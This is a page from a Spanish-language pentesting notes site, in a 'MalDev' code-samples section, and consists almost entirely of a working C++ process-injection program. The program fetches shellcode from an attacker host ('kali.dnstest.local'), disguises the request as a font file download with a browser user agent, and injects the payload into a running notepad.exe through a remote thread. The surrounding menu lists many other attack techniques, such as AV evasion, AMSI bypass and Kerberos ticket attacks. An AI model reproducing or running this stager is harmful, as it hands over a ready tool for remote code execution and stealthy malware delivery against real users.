CyberSec Notes
  • Bienvenida
    • CyberSec Notes
  • Network Services
    • Port 21 - FTP
    • Port 22 - SSH
    • Port 23 - Telnet
    • Port 25 - SMTP
    • Port 53 - DNS
      • Deploy DNS Server with BIND
    • Port 80/443 - HTTP/HTTPS
      • Wordpress
      • CMS Made Simple (CMSMS)
    • Port 88 - Kerberos
    • Port 386, 636, 3268, 3269 - LDAP
    • Port 445 - SMB
    • Port 1521,1522-1529 - Oracle TNS Listener
    • Port 3128 - Squid
    • Port 5985, 5986 - WinRM
  • Command && Control
    • Sliver C2 [in progress]
  • Ataques en Entornos Windows
    • MalDev
      • AV Evasion
        • Function call obfuscation
      • Code Samples
        • Shellcode Execution C#
        • Shellcode Execution C++
        • Stager HTTP C#
        • Stager HTTP C++
        • Process Inyection C++
        • Process Inyection C#
        • XOR Encrypt C++
    • Directorio Activo
      • Spriying
      • Autenticacion Net-NTLMv2 y tipos de hashes
        • Pass the Hash
        • SMB Relay
      • Autenticación Kerberos
        • Extensiones del protocolo Kerberos (SPNs & PACs)
        • AS_REP Roasting
        • Kerberoasting
        • Silver Ticket Attack
        • Golden Ticket Attack
      • DCSync
      • Mimikatz
      • BloodHound
      • Privilege Escalation
        • PS Credentials in XML format
      • Utils
    • Amsi Bypass
    • Buffer Overflow
      • Stack Based 32 bits [in progress]
        • Windows SLMail 5.5
  • Ataques en Entornos Linux
    • Privilege escalation [in progress]
    • MalDev
      • Simple Reverse Shell
    • Buffer Over Flow
      • Stack Based 32 bits
        • Linux, Vulnerable functions in C programs
    • Persistencia
  • General
    • Host Discovery
    • Reverse Shells Cheet Sheet
    • Pivoting
      • Chisel
      • Port Forwarding
      • Nmap con pivoting
    • Google Dorks [in progress]
    • Denial of Service (DoS)
      • Low and Slow
    • Docker
  • Pentesting Web
    • XML External Entity Injection(XXE)
      • Portswigger Lab #1: Retrieve Files
      • Portswigger Lab #2: Perform SSRF
      • Portswigger Lab #6: Blind XXE to retrieve data via error messages
    • Open Redirect
    • LFI
      • Log Poisoning (Apache, SSH y SMPT)
  • Wireless Pentesting
    • Pre Connection Attacks
      • WEP
      • WPA/WPA2
    • Post Connection Attacks
      • ARP Spoof
    • Fake AP for Captive Portal
Powered by GitBook
On this page
  1. Ataques en Entornos Windows
  2. MalDev
  3. Code Samples

Process Inyection C++

#include <windows.h>
#include <wininet.h>
#include <tlhelp32.h>
#include <stdio.h>

#pragma comment (lib, "Wininet.lib")


struct Shellcode {
    BYTE* pcData;
    DWORD dwSize;
};


DWORD GetTargetPID();
BOOL Download(LPCWSTR host, INTERNET_PORT port, Shellcode* shellcode);
BOOL Inject(DWORD dwPID, Shellcode shellcode);


int main() {
    //::ShowWindow(::GetConsoleWindow(), SW_HIDE); // hide console window

    DWORD pid = GetTargetPID();
    if (pid == 0) { return 1; }

    struct Shellcode shellcode;
    if (!Download(L"kali.dnstest.local", 80, &shellcode)) { return 2; }

    //printf("Injecting %ld bytes into PID %ld\n", shellcode.dwSize, pid);
    if (!Inject(pid, shellcode)) { return 3; }

    return 0;
}

// ------ Getting the shellcode ------ //

BOOL Download(LPCWSTR host, INTERNET_PORT port, Shellcode* shellcode) {
    HINTERNET session = InternetOpen(
        L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36",
        INTERNET_OPEN_TYPE_PRECONFIG,
        NULL,
        NULL,
        0);

    HINTERNET connection = InternetConnect(
        session,
        host,
        port,
        L"",
        L"",
        INTERNET_SERVICE_HTTP,
        0,
        0);

    HINTERNET request = HttpOpenRequest(
        connection,
        L"GET",
        L"/fontawesome.woff",
        NULL,
        NULL,
        NULL,
        0,
        0);

    WORD counter = 0;
    while (!HttpSendRequest(request, NULL, 0, 0, 0)) {
        counter++;
        Sleep(3000);
        if (counter >= 3) {
            return 0; // HTTP requests eventually failed
        }
    }

    DWORD bufSize = BUFSIZ;
    BYTE* buffer = new BYTE[bufSize];

    DWORD capacity = bufSize;
    BYTE* payload = (BYTE*)malloc(capacity);

    DWORD payloadSize = 0;

    while (true) {
        DWORD bytesRead;

        if (!InternetReadFile(request, buffer, bufSize, &bytesRead)) {
            return 0;
        }

        if (bytesRead == 0) break;

        if (payloadSize + bytesRead > capacity) {
            capacity *= 2;
            BYTE* newPayload = (BYTE*)realloc(payload, capacity);
            payload = newPayload;
        }

        for (DWORD i = 0; i < bytesRead; i++) {
            payload[payloadSize++] = buffer[i];
        }

    }
    BYTE* newPayload = (BYTE*)realloc(payload, payloadSize);

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(session);

    (*shellcode).pcData = payload;
    (*shellcode).dwSize = payloadSize;
    return 1;
}

// ------ Finding a target process ------ //

DWORD GetFirstPIDProclist(const WCHAR** aszProclist, DWORD dwSize);
DWORD GetFirstPIDProcname(const WCHAR* szProcname);

DWORD GetTargetPID() {
    const WCHAR* aszProclist[2] = {
        L"notepad.exe",
        //L"msedge.exe"
    };
    return GetFirstPIDProclist(aszProclist, sizeof(aszProclist) / sizeof(aszProclist[0]));
}

DWORD GetFirstPIDProclist(const WCHAR** aszProclist, DWORD dwSize) {
    DWORD pid = 0;
    for (int i = 0; i < dwSize; i++) {
        pid = GetFirstPIDProcname(aszProclist[i]);
        if (pid > 0) {
            return pid;
        }
    }

    return 0;
}

DWORD GetFirstPIDProcname(const WCHAR* szProcname) {
    HANDLE hProcessSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (INVALID_HANDLE_VALUE == hProcessSnapshot) return 0;

    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(hProcessSnapshot, &pe32)) {
        CloseHandle(hProcessSnapshot);
        return 0;
    }

    DWORD pid = 0;
    while (Process32Next(hProcessSnapshot, &pe32)) {
        if (lstrcmpiW(szProcname, pe32.szExeFile) == 0) {
            pid = pe32.th32ProcessID;
            //printf("Process found: %d %ls\n", pid, pe32.szExeFile);
            break;
        }
    }

    CloseHandle(hProcessSnapshot);
    return pid;
}

// ------ Injecting into process ------ //

BOOL Inject(DWORD dwPID, Shellcode shellcode) {
    HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, dwPID);
    if (!hProcess) { return 0; };

    LPVOID pRemoteAddr = VirtualAllocEx(hProcess, NULL, shellcode.dwSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READ);
    if (!pRemoteAddr) {
        CloseHandle(hProcess);
        return 0;
    };

    if (!WriteProcessMemory(hProcess, pRemoteAddr, shellcode.pcData, shellcode.dwSize, NULL)) {
        CloseHandle(hProcess);
        return 0;
    };

    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteAddr, NULL, 0, NULL);
    if (hThread != NULL) {
        WaitForSingleObject(hThread, 500);

        CloseHandle(hThread);
        CloseHandle(hProcess);
        return 1;
    }

    CloseHandle(hProcess);
    return 0;
}

PreviousStager HTTP C++NextProcess Inyection C#

Last updated 1 year ago